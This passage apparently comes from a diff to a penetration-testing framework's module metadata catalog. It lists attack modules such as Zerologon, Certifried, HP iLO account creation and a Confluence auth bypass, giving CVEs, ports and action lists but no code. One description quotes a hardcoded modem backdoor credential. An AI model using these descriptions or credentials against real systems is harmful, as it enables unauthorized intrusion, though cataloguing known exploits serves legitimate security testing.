"description": "This modules exploits a remote registry access flaw in the BackupExec Windows\n Server RPC service. This vulnerability was discovered by Pedram Amini and is based\n on the NDR stub information posted to openrce.org.\n Please see the action list for the different attack modes.", + "references": [ + "OSVDB-17627", + "CVE-2005-0771", + "URL-https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269" + ], + "platform": "", + "arch": "", + "rport": 6106, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/backupexec/registry.rb", + "is_install_path": true, + "ref_name": "admin/backupexec/registry", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Create Logon Notice", + "description": "Add a logon notice" + }, + { + "name": "System Information", + "description": "Dump system info (user, owner, OS, CPU...)" + } + ] + }, + "auxiliary_admin/chromecast/chromecast_reset": { + "name": "Chromecast Factory Reset DoS", + "fullname": "auxiliary/admin/chromecast/chromecast_reset", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "wvu " + ], + "description": "This module performs a factory reset on a Chromecast, causing a denial of service (DoS).\n No user authentication is required.", + "references": [ + "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html" + ], + "platform": "", + "arch": "", + "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb", + "is_install_path": true, + "ref_name": "admin/chromecast/chromecast_reset", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Reboot", + "description": "Reboot only" + }, + { + "name": "Reset", + "description": "Factory reset" + } + ] + }, + "auxiliary_admin/chromecast/chromecast_youtube": { + "name": "Chromecast YouTube Remote Control", + "fullname": "auxiliary/admin/chromecast/chromecast_youtube", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "wvu " + ], + "description": "This module acts as a simple remote control for Chromecast YouTube.\n\n Only the deprecated DIAL protocol is supported by this module.\n Casting via the newer CASTV2 protocol is unsupported at this time.", + "references": [ + "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html" + ], + "platform": "", + "arch": "", + "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2019-05-29 12:19:52 +0000", + "path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb", + "is_install_path": true, + "ref_name": "admin/chromecast/chromecast_youtube", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Play", + "description": "Play video" + }, + { + "name": "Stop", + "description": "Stop video" + } + ] + }, + "auxiliary_admin/citrix/citrix_netscaler_config_decrypt": { + "name": "Decrypt Citrix NetScaler Config Secrets", + "fullname": "auxiliary/admin/citrix/citrix_netscaler_config_decrypt", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-05-19", + "type": "auxiliary", + "author": [ + "npm " + ], + "description": "This module takes a Citrix NetScaler ns.conf configuration file as\n input and extracts secrets that have been stored with reversible\n encryption. The module supports legacy NetScaler encryption (RC4)\n as well as the newer AES-256-ECB and AES-256-CBC encryption types.\n It is also possible to decrypt secrets protected by the Key\n Encryption Key (KEK) method, provided the key fragment files F1.key\n and F2.key are provided.", + "references": [ + "URL-https://dozer.nz/posts/citrix-decrypt/", + "URL-https://www.ferroquesystems.com/resource/citrix-adc-security-kek-files/" + ], + "platform": "BSD", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb", + "is_install_path": true, + "ref_name": "admin/citrix/citrix_netscaler_config_decrypt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Dump", + "description": "Dump secrets from NetScaler configuration" + } + ] + }, + "auxiliary_admin/db2/db2rcmd": { + "name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability", + "fullname": "auxiliary/admin/db2/db2rcmd", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-03-04", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits a vulnerability in the Remote Command Server\n component in IBM's DB2 Universal Database 8.1. An authenticated\n attacker can send arbitrary commands to the DB2REMOTECMD named pipe\n which could lead to administrator privileges.", + "references": [ + "CVE-2004-0795", + "OSVDB-4180", + "BID-9821" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/auxiliary/admin/db2/db2rcmd.rb", + "is_install_path": true, + "ref_name": "admin/db2/db2rcmd", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/dcerpc/cve_2020_1472_zerologon": { + "name": "Netlogon Weak Cryptographic Authentication", + "fullname": "auxiliary/admin/dcerpc/cve_2020_1472_zerologon", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Tom Tervoort", + "Spencer McIntyre", + "Dirk-jan Mollema" + ], + "description": "A vulnerability exists within the Netlogon authentication process where the security properties granted by AES\n are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker\n can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts\n using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability\n to reset the machine account password to an empty string, which will then allow the attacker to authenticate as\n the machine account. After exploitation, it's important to restore this password to it's original value. Failure\n to do so can result in service instability.", + "references": [ + "CVE-2020-1472", + "URL-https://www.secura.com/blog/zero-logon", + "URL-https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py", + "URL-https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2022-08-03 14:27:30 +0000", + "path": "/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", + "is_install_path": true, + "ref_name": "admin/dcerpc/cve_2020_1472_zerologon", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Zerologon" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "REMOVE", + "description": "Remove the machine account password" + }, + { + "name": "RESTORE", + "description": "Restore the machine account password" + } + ] + }, + "auxiliary_admin/dcerpc/cve_2022_26923_certifried": { + "name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)", + "fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Oliver Lyak", + "CravateRouge", + "Erik Wynter", + "Christophe De La Fuente" + ], + "description": "This module exploits a privilege escalation vulnerability in Active\n Directory Certificate Services (ADCS) to generate a valid certificate\n impersonating the Domain Controller (DC) computer account. This\n certificate is then used to authenticate to the target as the DC\n account using PKINIT preauthentication mechanism. The module will get\n and cache the Ticket-Granting-Ticket (TGT) for this account along\n with its NTLM hash. Finally, it requests a TGS impersonating a\n privileged user (Administrator by default). This TGS can then be used\n by other modules or external tools.", + "references": [ + "URL-https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", + "URL-https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html", + "CVE-2022-26923" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2025-03-21 10:30:20 +0000", + "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb", + "is_install_path": true, + "ref_name": "admin/dcerpc/cve_2022_26923_certifried", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "Certifried" + ], + "Reliability": [], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "AUTHENTICATE", + "description": "Same as REQUEST_CERT but also authenticate" + }, + { + "name": "PRIVESC", + "description": "Full privilege escalation attack" + }, + { + "name": "REQUEST_CERT", + "description": "Request a certificate with DNS host name matching the DC" + } + ] + }, + "auxiliary_admin/dcerpc/icpr_cert": { + "name": "ICPR Certificate Management", + "fullname": "auxiliary/admin/dcerpc/icpr_cert", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Will Schroeder", + "Lee Christensen", + "Oliver Lyak", + "Spencer McIntyre" + ], + "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.\n\n This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.", + "references": [ + "URL-https://github.com/GhostPack/Certify", + "URL-https://github.com/ly4k/Certipy" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2025-03-21 10:30:20 +0000", + "path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb", + "is_install_path": true, + "ref_name": "admin/dcerpc/icpr_cert", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [], + "SideEffects": [ + "ioc-in-logs" + ], + "AKA": [ + "Certifry", + "Certipy" + ] + }, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "REQUEST_CERT", + "description": "Request a certificate" + } + ] + }, + "auxiliary_admin/dcerpc/samr_account": { + "name": "SAMR Account Management", + "fullname": "auxiliary/admin/dcerpc/samr_account", + "aliases": [ + "auxiliary/admin/dcerpc/samr_computer" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "JaGoTu", + "Spencer McIntyre", + "smashery" + ], + "description": "Add, lookup and delete user / machine accounts via MS-SAMR. By default\n standard active directory users can add up to 10 new computers to the\n domain (MachineAccountQuota). Administrative privileges however are required\n to delete the created accounts, or to create/delete user accounts.", + "references": [ + "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/dcerpc/samr_account.rb", + "is_install_path": true, + "ref_name": "admin/dcerpc/samr_account", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [], + "SideEffects": [ + "ioc-in-logs" + ], + "AKA": [ + "samr_computer", + "samr_user" + ] + }, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "ADD_COMPUTER", + "description": "Add a computer account" + }, + { + "name": "ADD_USER", + "description": "Add a user account" + }, + { + "name": "DELETE_ACCOUNT", + "description": "Delete a computer or user account" + }, + { + "name": "LOOKUP_ACCOUNT", + "description": "Lookup a computer or user account" + } + ] + }, + "auxiliary_admin/dns/dyn_dns_update": { + "name": "DNS Server Dynamic Update Record Injection", + "fullname": "auxiliary/admin/dns/dyn_dns_update", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "King Sabri ", + "Brent Cook " + ], + "description": "This module allows adding and/or deleting a record to\n any remote DNS server that allows unrestricted dynamic updates.", + "references": [ + "URL-https://www.tenable.com/plugins/nessus/35372", + "URL-https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject", + "URL-https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/", + "URL-https://github.com/ChrisTruncer/PenTestScripts/blob/master/HostScripts/DNSInject.py" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb", + "is_install_path": true, + "ref_name": "admin/dns/dyn_dns_update", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Add a new record. Fail if it already exists." + }, + { + "name": "DELETE", + "description": "Delete an existing record." + }, + { + "name": "UPDATE", + "description": "Add or update a record. (default)" + } + ] + }, + "auxiliary_admin/edirectory/edirectory_dhost_cookie": { + "name": "Novell eDirectory DHOST Predictable Session Cookie", + "fullname": "auxiliary/admin/edirectory/edirectory_dhost_cookie", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module is able to predict the next session cookie value issued\n by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run\n this module, wait until the real administrator logs in, then specify the\n predicted cookie value to hijack their session.", + "references": [ + "CVE-2009-4655", + "OSVDB-60035" + ], + "platform": "", + "arch": "", + "rport": 8030, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2018-07-08 19:00:11 +0000", + "path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb", + "is_install_path": true, + "ref_name": "admin/edirectory/edirectory_dhost_cookie", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/edirectory/edirectory_edirutil": { + "name": "Novell eDirectory eMBox Unauthenticated File Access", + "fullname": "auxiliary/admin/edirectory/edirectory_edirutil", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Nicob", + "MC ", + "sinn3r " + ], + "description": "This module will access Novell eDirectory's eMBox service and can run the\n following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,\n STOP_SERVICE, START_SERVICE, SET_LOGFILE.", + "references": [ + "CVE-2008-0926", + "BID-28441", + "OSVDB-43690" + ], + "platform": "", + "arch": "", + "rport": 8028, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb", + "is_install_path": true, + "ref_name": "admin/edirectory/edirectory_edirutil", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "GET_DN", + "description": "Get DN" + }, + { + "name": "LIST_SERVICES", + "description": "List services" + }, + { + "name": "READ_LOGS", + "description": "Read all the log files" + }, + { + "name": "SET_LOGFILE", + "description": "Read Log File" + }, + { + "name": "START_SERVICE", + "description": "Start a service" + }, + { + "name": "STOP_SERVICE", + "description": "Stop a service" + } + ] + }, + "auxiliary_admin/emc/alphastor_devicemanager_exec": { + "name": "EMC AlphaStor Device Manager Arbitrary Command Execution", + "fullname": "auxiliary/admin/emc/alphastor_devicemanager_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-05-27", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", + "references": [ + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703", + "OSVDB-45715", + "CVE-2008-2157", + "BID-29398" + ], + "platform": "", + "arch": "", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb", + "is_install_path": true, + "ref_name": "admin/emc/alphastor_devicemanager_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/emc/alphastor_librarymanager_exec": { + "name": "EMC AlphaStor Library Manager Arbitrary Command Execution", + "fullname": "auxiliary/admin/emc/alphastor_librarymanager_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-05-27", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", + "references": [ + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703", + "CVE-2008-2157", + "OSVDB-45715", + "BID-29398" + ], + "platform": "", + "arch": "", + "rport": 3500, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb", + "is_install_path": true, + "ref_name": "admin/emc/alphastor_librarymanager_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/firetv/firetv_youtube": { + "name": "Amazon Fire TV YouTube Remote Control", + "fullname": "auxiliary/admin/firetv/firetv_youtube", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "wvu " + ], + "description": "This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.", + "references": [ + "URL-http://http://web.archive.org/web/20210301101536/http://www.amazon.com/dp/B00CX5P8FC/?_encoding=UTF8", + "URL-https://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs" + ], + "platform": "", + "arch": "", + "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 11:29:59 +0000", + "path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb", + "is_install_path": true, + "ref_name": "admin/firetv/firetv_youtube", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Play", + "description": "Play video" + }, + { + "name": "Stop", + "description": "Stop video" + } + ] + }, + "auxiliary_admin/hp/hp_data_protector_cmd": { + "name": "HP Data Protector 6.1 EXEC_CMD Command Execution", + "fullname": "auxiliary/admin/hp/hp_data_protector_cmd", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-07", + "type": "auxiliary", + "author": [ + "ch0ks", + "c4an", + "wireghoul", + "sinn3r " + ], + "description": "This module exploits HP Data Protector's omniinet process, specifically\n against a Windows setup.\n\n When an EXEC_CMD packet is sent, omniinet.exe will attempt to look\n for that user-supplied filename with kernel32!FindFirstFileW(). If the file\n is found, the process will then go ahead execute it with CreateProcess()\n under a new thread. If the filename isn't found, FindFirstFileW() will throw\n an error (0x03), and then bails early without triggering CreateProcess().\n\n Because of these behaviors, if you try to supply an argument, FindFirstFileW()\n will look at that as part of the filename, and then bail.\n\n Please note that when you specify the 'CMD' option, the base path begins\n under C:\\.", + "references": [ + "CVE-2011-0923", + "OSVDB-72526", + "ZDI-11-055", + "URL-https://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/" + ], + "platform": "", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb", + "is_install_path": true, + "ref_name": "admin/hp/hp_data_protector_cmd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/hp/hp_ilo_create_admin_account": { + "name": "HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation", + "fullname": "auxiliary/admin/hp/hp_ilo_create_admin_account", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-08-24", + "type": "auxiliary", + "author": [ + "Fabien Perigaud " + ], + "description": "This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer\n overflow in the Connection HTTP header handling by the web server.\n Exploiting this vulnerability gives full access to the REST API, allowing arbitrary\n accounts creation.", + "references": [ + "CVE-2017-12542", + "BID-100467", + "URL-https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-hpesbhf03769en_us", + "URL-https://www.synacktiv.com/en/publications/hp-ilo-talk-at-recon-brx-2018.html" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb", + "is_install_path": true, + "ref_name": "admin/hp/hp_ilo_create_admin_account", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/hp/hp_imc_som_create_account": { + "name": "HP Intelligent Management SOM Account Creation", + "fullname": "auxiliary/admin/hp/hp_imc_som_create_account", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-08", + "type": "auxiliary", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.", + "references": [ + "CVE-2013-4824", + "OSVDB-98249", + "BID-62902", + "ZDI-13-240", + "URL-https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-c03943547" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb", + "is_install_path": true, + "ref_name": "admin/hp/hp_imc_som_create_account", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/allegro_rompager_auth_bypass": { + "name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass", + "fullname": "auxiliary/admin/http/allegro_rompager_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-12-17", + "type": "auxiliary", + "author": [ + "Jon Hart ", + "Jan Trencansky ", + "Lior Oppenheim" + ], + "description": "This module exploits HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.", + "references": [ + "CVE-2014-9222", + "URL-https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/", + "URL-https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf", + "URL-https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/allegro_rompager_auth_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/arris_motorola_surfboard_backdoor_xss": { + "name": "Arris / Motorola Surfboard SBG6580 Web Interface Takeover", + "fullname": "auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-04-08", + "type": "auxiliary", + "author": [ + "joev " + ], + "description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n several vulnerabilities that, when combined, allow an arbitrary website to take\n control of the modem, even if the user is not currently logged in. The attacker\n must successfully know, or guess, the target's internal gateway IP address.\n This is usually a default value of 192.168.0.1.\n\n First, a hardcoded backdoor account was discovered in the source code\n of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n in the device's login form, these credentials - along with the default\n \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n inadvertently logging the user into the router.\n\n Once successfully logged in, a persistent XSS vulnerability is\n exploited in the firewall configuration page. This allows injection of\n Javascript that can perform any available action in the router interface.\n\n The following firmware versions have been tested as vulnerable:\n\n SBG6580-6.5.2.0-GA-06-077-NOSH, and\n SBG6580-8.6.1.0-GA-04-098-NOSH", + "references": [ + "CVE-2015-0964", + "CVE-2015-0965", + "CVE-2015-0966", + "URL-http://web.archive.org/web/20220810083803/https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb", + "is_install_path": true, + "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_admin/http/atlassian_confluence_auth_bypass": { + "name": "Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control", + "fullname": "auxiliary/admin/http/atlassian_confluence_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2023-10-04", + "type": "auxiliary", + "author": [ + "Unknown", + "Emir Polat" + ], + "description": "This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.\n A specially crafted request can be create new admin account without authentication on the target Atlassian server.", + "references": [ + "CVE-2023-22515", + "URL-https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2023-22515", + "URL-https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis" + ], + "platform": "", + "arch": "", + "rport": 8090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-10-19 17:11:03 +0000", + "path": "/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/atlassian_confluence_auth_bypass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/axigen_file_access": { + "name": "Axigen Arbitrary File Read and Delete", + "fullname": "auxiliary/admin/http/axigen_file_access", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-10-31", + "type": "auxiliary", + "author": [ + "Zhao Liang", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability in the WebAdmin\n interface of Axigen, which allows an authenticated user to read and delete\n arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n Windows platforms. This module has been tested successfully on Axigen 8.10 over\n Windows 2003 SP2.", + "references": [ + "US-CERT-VU-586556", + "CVE-2012-4940", + "OSVDB-86802" + ], + "platform": "", + "arch": "", + "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/axigen_file_access.rb", + "is_install_path": true, + "ref_name": "admin/http/axigen_file_access", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Delete", + "description": "Delete remote file" + }, + { + "name": "Read", + "description": "Read remote file" + } + ] + }, + "auxiliary_admin/http/cfme_manageiq_evm_pass_reset": { + "name": "Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection", + "fullname": "auxiliary/admin/http/cfme_manageiq_evm_pass_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-12", + "type": "auxiliary", + "author": [ + "Ramon de C Valle " + ], + "description": 